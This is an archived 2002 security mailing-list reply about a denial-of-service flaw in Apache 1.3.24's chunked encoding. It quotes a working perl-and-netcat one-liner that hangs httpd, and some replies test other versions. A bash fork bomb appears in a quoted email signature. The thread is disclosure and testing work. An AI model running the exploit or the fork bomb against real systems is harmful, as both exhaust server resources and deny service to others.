DEAR Edwin Groothuis:
Apache/1.3.23 (Unix) (Red-Hat/Linux) in my box doesn't show this dehaviour
kiven_chen
======= 2002-06-20 12:13:00 IN YOUR E-MAIL£º=======
>On Thu, Jun 20, 2002 at 12:21:47AM +0200, Przemyslaw Frasunek wrote:
>> I was playing a bit with chunked encoding vulnerability and found the
>> following. When I send a request to Apache 1.3.24 using malformed
>> chunked encoding, httpd process goes into infinite loop and CPU load
>> grows to 100. Example:
>>
>> perl -e 'print "POST http://www/index.html HTTP/1.1\r\nAccept: */*\r\nHost: www\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-length: 5000\r\n\r\n" . "A"x5000 . "\r\n\r\n"' | nc localhost 80
>>
>> 62681 www 63 0 146M 5364K RUN 3:08 45.90 45.90 apache
>> 42121 www 63 0 139M 2524K RUN 1:15 44.97 44.97 apache
>>
>> Can anyone try it with 1.3.26?
>
>Apache 1.3.26 doesn't show this behaviour
>(yes, I've tried it with 1.3.20 first)
>
>Edwin
>--
>Edwin Groothuis | Personal website: http://www.MavEtJu.org
>edwinat_private | Interested in MUDs? Visit Fatal Dimensions:
>bash$ :(){ :|:&};: | http://www.FatalDimensions.org/
= = = = = = = = = = = = = = = = = = = =
This archive was generated by hypermail 2b30 : Thu Jun 20 2002 - 09:13:20 PDT